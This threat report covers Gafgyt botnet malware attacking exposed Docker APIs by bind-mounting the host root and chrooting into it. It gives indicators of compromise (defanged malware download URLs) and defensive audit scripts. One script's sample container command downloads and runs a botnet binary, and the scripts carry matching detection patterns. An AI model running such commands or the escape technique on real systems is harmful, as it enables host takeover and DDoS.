Gafgyt Malware Expands Its Reach Targeting Docker Servers

Threat Group: Various Cybercriminal Entities
Threat Type: Botnet Malware
Exploited Vulnerabilities: Misconfigured Docker Remote API servers, weak/default credentials in IoT devices
Malware Used: Gafgyt (also known as Bashlite, Lizkebab)
Threat Score: High (8.5/10) — Due to its expansion into Docker environments and potential for widespread DDoS attacks
Last Threat Observation: December 3, 2024, by Trend Micro


Overview

Gafgyt malware, also known as Bashlite or Lizkebab, has traditionally been a prominent threat in the Internet of Things (IoT) landscape, targeting vulnerable devices such as routers, DVRs, and cameras to form extensive botnets for launching distributed denial-of-service (DDoS) attacks. Recent research has revealed a significant shift in its behavior as it expands its scope to exploit misconfigured Docker Remote API servers. By attacking Docker environments, the malware moves beyond IoT devices, positioning itself as a versatile threat capable of leveraging modern containerized infrastructure to amplify its impact.

This new tactic involves exploiting publicly exposed Docker Remote API servers to create containers from legitimate images such as "alpine." The container is created with the host's root filesystem bind-mounted into it; the attacker then chroots into that mount and deploys the Gafgyt binary, gaining access to the host filesystem and the ability to run DDoS attacks from the compromised host. This evolution not only increases the potential attack surface but also signals that threat actors are increasingly focusing on weaknesses in cloud-native environments to orchestrate large-scale disruptions. Organizations relying on containerized applications and infrastructure must recognize this shift and adapt their security strategies accordingly.


Key Details

  • Delivery Method:
    • Exploitation of misconfigured Docker Remote API servers to deploy malicious containers.
    • Abuse of weak or default credentials in IoT devices to facilitate unauthorized access.
  • Targets:
    • Publicly exposed Docker Remote API servers lacking proper security configurations.
    • Vulnerable IoT devices, including routers, cameras, and DVRs.
  • Functions:
    1. Distributed Denial-of-Service (DDoS) Attacks:
      • Launches various types of DDoS attacks, such as UDP, TCP, ICMP, SYN, and HTTP floods, to overwhelm target systems.
    2. Privilege Escalation (Container-to-Host Access):
      • Creates the container with the host's root directory bind-mounted (the "Binds" setting of the Docker API container-create request) and runs chroot into that mount. Because the Docker daemon runs as root, this gives the malware the host filesystem and effectively root-level control of the host.
    3. Persistence Mechanisms:
      • Implements persistence strategies using systemd services or cron jobs to maintain long-term access on compromised systems.
    4. Command and Control (C&C) Communication:
      • Connects to hardcoded C&C servers to receive instructions and updates, facilitating coordinated attack campaigns.
    5. Network Scanning:
      • Scans for other vulnerable devices within the network to propagate the infection and expand the botnet.
  • Obfuscation Techniques:
    • Deploys evasion methods such as checking for similar processes to avoid detection.
    • Uses legitimate Docker images (e.g., "alpine") to create containers, reducing suspicion.
    • Employs Base64 encoding for payloads to obscure malicious code.
  • Related Activity:
    • perfctl Malware:
      • A separate cryptocurrency-mining malware family, observed in October 2024 exploiting exposed Docker Remote API servers; it is not a Gafgyt variant.
      • Shares tactics, techniques, and procedures (TTPs) with the Gafgyt campaign, notably container creation through the exposed API, Base64-encoded payloads, and checks for similar running processes.
      • Together the two campaigns show that more than one actor now targets containerized environments through the same misconfiguration.
  • Recent Developments:
    • October 2024:
      • Attackers exploited exposed Docker Remote API servers to deploy the perfctl malware, highlighting a critical need for enhanced security in containerized infrastructures.
      • The attack sequence involved creating Docker containers with specific settings and executing Base64 encoded payloads, leading to privilege escalation and deployment of malicious binaries disguised as PHP extensions.
      • Evasion techniques included checking for similar processes and creating custom functions to download files, emphasizing the sophistication of the attack.


Attack Vectors

Gafgyt malware employs a multi-pronged approach to compromise systems, exploiting vulnerabilities in both traditional IoT devices and modern containerized environments. Its latest shift to targeting Docker Remote API servers demonstrates its evolving tactics, making it a versatile threat capable of exploiting a wide range of systems. Below is a detailed breakdown of the attack vectors used:

  1. Exploitation of Misconfigured Docker Remote API Servers
    • Initial Access: Attackers identify publicly exposed Docker Remote API servers with weak or absent authentication mechanisms. These servers are often misconfigured, leaving them vulnerable to unauthorized access.
    • Container Deployment: Using a legitimate Docker image (e.g., "alpine"), attackers create a container through the exposed API with the host's root directory bind-mounted into it (the "Binds" setting of the container-create request). The malware then runs chroot on that mount, which exposes the host filesystem and, since the Docker daemon runs as root, gives effectively root-level control of the host.
    • Payload Execution: The containers execute Gafgyt binaries with hardcoded C&C server addresses, facilitating communication for attack coordination.
  2. Targeting IoT Devices with Weak Security Configurations
    • Credential Exploitation: Gafgyt scans for IoT devices with open Telnet or SSH ports and attempts to gain access using default or weak credentials.
    • Vulnerability Exploitation: The malware also leverages known vulnerabilities in IoT devices to deploy malicious payloads and expand its botnet.
    • Self-Propagation: Once a device is compromised, Gafgyt scans the network for additional vulnerable devices to infect.
  3. Privilege Escalation and Host System Compromise
    • After gaining access to Docker or IoT devices, Gafgyt escalates privileges by exploiting insecure configurations. For Docker, it mounts the host filesystem to the container environment, granting access to critical system directories.
    • In IoT environments, it executes system-level commands to embed itself into the target device's operating system.
  4. Command and Control (C&C) Communication
    • Gafgyt communicates with hardcoded C&C servers to receive commands, download additional payloads, and orchestrate coordinated distributed denial-of-service (DDoS) attacks.
    • The malware can dynamically adapt its attack protocols based on instructions from the C&C server.
  5. Distributed Denial-of-Service (DDoS) Attacks
    • Gafgyt launches DDoS attacks using various protocols, including TCP, UDP, ICMP, SYN, and HTTP floods.
    • These attacks are aimed at overwhelming target networks, rendering them unavailable to legitimate users. The inclusion of HTTP-based attacks indicates a focus on application-layer disruptions.
  6. Backup Tactics for Failed Container Deployment
    • In cases where the initial container creation request fails, attackers attempt alternative methods. For instance, they may deploy a secondary Gafgyt binary (e.g., "atlas.i586") or use a shell script (e.g., "cve.sh") to download and execute botnet binaries for various architectures.
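To make the container-creation pattern above concrete, the following Python script is an added example (not code from Trend Micro or the Docker project) that audits docker inspect output for the tell-tale settings: a bind mount of the host root or another sensitive host path, privileged mode, a chroot into a mounted path, and a download from a bare-IP URL in the container command. The inspect JSON, the container names and the 203.0.113.10 address are constructed for the example, and the list of sensitive host paths is an assumption rather than a Docker-defined list.

```python
"""Audit `docker inspect` output for the container-escape pattern described above.

Added example, not code from Trend Micro or the Docker project. The inspect
JSON below is constructed; 203.0.113.10 is a documentation-range address, not
one of the page's indicators.
"""
import json
import re

# Constructed sample of `docker inspect` output, trimmed to the fields the audit
# needs. The first container mirrors the attack pattern (stock alpine image,
# host "/" bind-mounted at /mnt, chroot into it, botnet binary fetched from a
# bare-IP URL); the second is a benign web server.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "aaa111",
        "Name": "/brave_tesla",
        "Config": {
            "Image": "alpine",
            "Cmd": ["sh", "-c",
                    "chroot /mnt /bin/sh -c 'wget http://203.0.113.10/bins/atlas.i586 -O /tmp/a; "
                    "chmod +x /tmp/a; /tmp/a'"],
        },
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
    },
    {
        "Id": "bbb222",
        "Name": "/web",
        "Config": {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
    },
])

# Host paths whose bind mount hands the container the host filesystem or the
# Docker socket. Assumption for this example, not a Docker-defined list.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock"}

CHROOT_RE = re.compile(r"\bchroot\s+/\S*")
BARE_IP_DOWNLOAD_RE = re.compile(
    r"\b(?:wget|curl)\b[^;&|]*https?://\d{1,3}(?:\.\d{1,3}){3}")


def host_path_of(bind: str) -> str:
    """HostConfig.Binds entries have the form 'host_path:container_path[:opts]'."""
    return bind.split(":", 1)[0]


def audit_container(container: dict) -> list[str]:
    """Return human-readable findings for one container record."""
    findings = []
    host_cfg = container.get("HostConfig") or {}
    for bind in host_cfg.get("Binds") or []:
        host_path = host_path_of(bind)
        if host_path in SENSITIVE_HOST_PATHS:
            findings.append(f"sensitive host path {host_path!r} bind-mounted ({bind})")
    if host_cfg.get("Privileged"):
        findings.append("privileged container")
    cmd = " ".join((container.get("Config") or {}).get("Cmd") or [])
    if CHROOT_RE.search(cmd):
        findings.append("chroot into a mounted path in Cmd")
    if BARE_IP_DOWNLOAD_RE.search(cmd):
        findings.append("download from a bare-IP URL in Cmd")
    return findings


def audit_inspect_output(raw_json: str) -> dict[str, list[str]]:
    """Map container name -> findings, omitting containers with none."""
    report = {}
    for container in json.loads(raw_json):
        findings = audit_container(container)
        if findings:
            report[container["Name"]] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

Against a live host, feed the output of docker inspect $(docker ps -aq) to audit_inspect_output(). The image name is deliberately not a signal: legitimate workloads use "alpine" too, which is why the audit keys on the bind mount and the command rather than on what was pulled.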


Known Indicators of Compromise (IoCs)

IPv4

  • 178[.]215[.]238[.]24
  • 178[.]215[.]238[.]31

FileHash-MD5

  • d6d51754e28b24f50dc43048ee4db87f

FileHash-SHA1

  • c4170ea247cf32eaabbfa08b6868285fe3c24254

FileHash-SHA256

  • 0b7e14e3305fd25b250ad494c014b0f8dfefaf0f3e8413bd797db12dd2eb9d8c
  • 156c85a09a1d5d753ce3fd128e0bb6097bb5b18e6cc0ffe6f9bc99a218a21ed9
  • 19778568781fd397ee2415d0a3593ffcaff4f333cdc27e52a1b23e07de08fdb6
  • 36ee47d10acbf8fbc7b16d4d237e2be567491b95dcd333856268c6c63a02f358
  • 68c215494fd35e097bf76eb3886b95ec66fdc707ebcf10f221b4db4ac2cd6d70
  • 6b385dc32daff689c1c448bf5f9151996abbac730e167a9cbfa9111591f253ea
  • a79a9653209c9d942dee0be597e04845fc5250880edcc5c3cb50110153925a03
  • b7f0ac1551ab58a1b84ba8e63dfc98dd126f7abe686137cbffc8ff95bfbac1ba
  • bb2bd8819045055af5295c23d1293b2d215fabe7dcf097813b9624ab98a13976
  • c1c03eab6bbca461f4a9dc7395103cdb0aa018563e835150c66228f3d7edadaa
  • ed6c93faebd9a60e132f4f952a1b516e758ce0e445b225eb702dfd2c8c2db6c0
  • f7004355f2bf653d3f055bc674822f99a8ff3692a02c1aec6b727a782e37b836
  • f8388cba15175fa7fda8daacfd095972e1a96faaabeede411f99f42f71ae395b

URL

  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]arm4
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]arm5
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]arm6
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]arm7
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]i586
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]i686
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]m68k
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]mips
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]mipsel
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]sh4
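To put the indicators above to use, here is an added Python example (not from the Trend Micro or AlienVault sources) that refangs the defanged entries, sorts them into hashes, IP addresses and URLs, and checks them against local telemetry. The proxy log lines and the endpoint hash export are constructed for the example. Only a subset of the URLs is embedded, but the host of every listed URL is treated as an indicator in its own right, which is why a download of a binary not in the subset (atlas.arm7) is still caught.

```python
"""Match the defanged indicators from this page against local telemetry.

Added example; the indicator list is copied from the IoC section above, the
proxy log and hash export are constructed, not real data.
"""
import re

# Indicators in the defanged form used above (subset of the URLs, for brevity).
IOC_TEXT = """
178[.]215[.]238[.]24
178[.]215[.]238[.]31
hxxp://178[.]215[.]238[.]31/bins/atlas[.]i586
hxxp://178[.]215[.]238[.]31/bins/atlas[.]mips
d6d51754e28b24f50dc43048ee4db87f
c4170ea247cf32eaabbfa08b6868285fe3c24254
0b7e14e3305fd25b250ad494c014b0f8dfefaf0f3e8413bd797db12dd2eb9d8c
f8388cba15175fa7fda8daacfd095972e1a96faaabeede411f99f42f71ae395b
"""

# Constructed telemetry: squid-style proxy lines and hashes exported from an
# endpoint agent (which upper-cases them, so matching must normalise case).
PROXY_LOG = [
    "1733212345.123 45 10.0.0.7 TCP_MISS/200 1024 GET http://178.215.238.31/bins/atlas.arm7 - HIER_DIRECT/178.215.238.31 application/octet-stream",
    "1733212350.001 12 10.0.0.9 TCP_MISS/200 2048 GET http://dl-cdn.alpinelinux.org/alpine/v3.20/main/x86_64/APKINDEX.tar.gz - HIER_DIRECT/151.101.2.133 application/gzip",
    "1733212361.500 30 10.0.0.7 TCP_MISS/200 512 GET http://178.215.238.31/bins/atlas.mips - HIER_DIRECT/178.215.238.31 application/octet-stream",
]
ENDPOINT_HASHES = [
    "F8388CBA15175FA7FDA8DAACFD095972E1A96FAAABEEDE411F99F42F71AE395B",  # listed above
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",  # SHA-256 of empty input, benign
]

HASH_RE = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$")
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
URL_RE = re.compile(r"https?://([^/\s:]+)\S*")


def refang(s: str) -> str:
    """Undo the hxxp:// and [.] defanging so indicators match real traffic."""
    return s.replace("hxxp", "http").replace("[.]", ".")


def load_iocs(text: str) -> dict[str, set[str]]:
    """Sort indicator tokens into hashes, IPs and URLs (all lower-cased)."""
    iocs = {"hash": set(), "ip": set(), "url": set()}
    for token in text.split():
        t = refang(token).lower()
        if HASH_RE.match(t):
            iocs["hash"].add(t)
        elif IP_RE.match(t):
            iocs["ip"].add(t)
        elif t.startswith("http"):
            iocs["url"].add(t)
            # The host serving a listed binary is an indicator on its own.
            iocs["ip"].add(URL_RE.match(t).group(1))
    return iocs


def match_proxy_log(lines: list[str], iocs: dict) -> list[tuple[int, str, str]]:
    """Return (line_number, reason, matched_value) for each line that hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in URL_RE.finditer(line):
            url, host = m.group(0), m.group(1)
            if url in iocs["url"]:
                hits.append((n, "exact-url", url))
                break
            if host in iocs["ip"]:
                hits.append((n, "known-host", host))
                break
    return hits


def match_hashes(hashes: list[str], iocs: dict) -> list[str]:
    """Return the listed hashes present in the export, case-normalised."""
    return sorted(h.lower() for h in hashes if h.lower() in iocs["hash"])


if __name__ == "__main__":
    iocs = load_iocs(IOC_TEXT)
    for hit in match_proxy_log(PROXY_LOG, iocs):
        print("proxy:", hit)
    for h in match_hashes(ENDPOINT_HASHES, iocs):
        print("hash:", h)
```

Matching on the host as well as the exact URL is what makes the per-architecture naming (atlas.arm4 through atlas.sh4) manageable: the binaries differ by target CPU but are served from the same address, so a new architecture suffix does not evade the check.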

Mitigation and Prevention

  1. Secure Docker Configurations:
    • Do not expose the Docker Remote API (TCP 2375/2376) to the internet. If remote access is required, bind the listener to a management address, require TLS client certificates (tlsverify) or tunnel the API over SSH, and restrict the port with network allowlisting.
  2. Regular Updates:
    • Patch Docker and related software frequently to address known vulnerabilities.
  3. Container Security:
    • Avoid privileged container modes and do not allow bind mounts of the host root or the Docker socket; an authorization plugin or rootless Docker limits what an API caller can request.
    • Use trusted, verified Docker images, keeping in mind that a legitimate image such as "alpine" is not itself a signal: review how containers are created and with which mounts.
  4. Network Monitoring:
    • Continuously analyze traffic patterns for anomalies associated with DDoS activity.
  5. User Awareness:
    • Educate IT staff on potential misuse of container systems and response protocols.
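The first mitigation above in concrete form: the following added Python example (not Docker's own tooling) audits a daemon.json for the exposure Gafgyt abuses, namely a TCP listener on all interfaces, the plaintext port 2375, and any TCP listener without tlsverify, and shows a hardened configuration next to the insecure one. Both configurations and the certificate paths are constructed for the example; the 10.0.0.5 management address is a placeholder.

```python
"""Audit dockerd's daemon.json for the exposure Gafgyt abuses.

Added example, not Docker's own tooling. Both configurations below are
constructed; the certificate paths and the 10.0.0.5 address are placeholders.
"""
import json

# Insecure: Remote API on every interface, plaintext port, no client auth.
INSECURE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Hardened: bound to one management address, TLS with mandatory client
# certificates (tlsverify), on the conventional TLS port 2376.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tls": True,
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

WILDCARD_ADDRS = {"", "0.0.0.0", "[::]", "::"}


def split_tcp_host(entry: str) -> tuple[str, str]:
    """'tcp://HOST:PORT' -> (HOST, PORT); HOST may be a bracketed IPv6 literal."""
    host_port = entry[len("tcp://"):]
    if host_port.endswith("]") or ":" not in host_port:
        # No explicit port; treated as 2375 here (assumption: dockerd's
        # unencrypted default).
        return host_port, "2375"
    host, _, port = host_port.rpartition(":")
    return host, port


def audit_daemon_json(raw: str) -> list[str]:
    """Return findings for the listeners and TLS settings in a daemon.json."""
    cfg = json.loads(raw)
    findings = []
    for entry in cfg.get("hosts", []):
        if not entry.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are local-only
        host, port = split_tcp_host(entry)
        if host in WILDCARD_ADDRS:
            findings.append(f"{entry}: Remote API bound to all interfaces")
        if port == "2375":
            findings.append(f"{entry}: plaintext API port 2375")
        if not cfg.get("tlsverify"):
            findings.append(f"{entry}: TCP listener without tlsverify, "
                            "anyone who can reach the port controls the host")
    if cfg.get("tlsverify"):
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify enabled but {key} is not set")
    return findings


if __name__ == "__main__":
    for label, raw in (("insecure", INSECURE_DAEMON_JSON),
                       ("hardened", HARDENED_DAEMON_JSON)):
        print(f"{label}: {audit_daemon_json(raw) or ['no findings']}")
```

Two caveats when applying this. On distributions whose systemd unit already passes -H fd:// to dockerd, setting "hosts" in daemon.json makes the daemon refuse to start because the option is then specified twice; put the listener in a systemd drop-in instead. And client-certificate TLS only restricts who may call the API: anyone holding a valid client certificate still gets root-equivalent control of the host, so the network restriction is still needed. A quick check for what is actually listening is ss -ltnp | grep dockerd.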

Conclusion

The evolution of Gafgyt malware from a botnet targeting IoT devices to a threat exploiting Docker environments highlights a dangerous shift in the cyber threat landscape. This adaptability showcases the growing sophistication of attackers, who now leverage vulnerabilities in modern infrastructure to amplify their impact. By targeting misconfigured Docker Remote API servers, Gafgyt not only increases its reach but also demonstrates how easily overlooked configurations can lead to significant security breaches. Its ability to launch devastating DDoS attacks while evading detection underscores the urgent need for heightened vigilance and robust security measures.

To combat this evolving threat, organizations must act decisively. Securing Docker environments, patching vulnerabilities, and enforcing strong authentication protocols are critical to reducing the attack surface. Additionally, proactive threat monitoring and education can empower teams to recognize and respond to emerging threats like Gafgyt. The stakes are high—failing to address this malware’s advanced tactics risks leaving critical systems exposed to widespread disruption. The fight against Gafgyt serves as a stark reminder that in cybersecurity, constant evolution and preparedness are the only defenses against an ever-adapting adversary.


Sources

  1. Trend Micro, "Gafgyt Malware Broadens Its Scope in Recent Attacks," December 2024.
  2. AlienVault OTX, "Indicators of Compromise."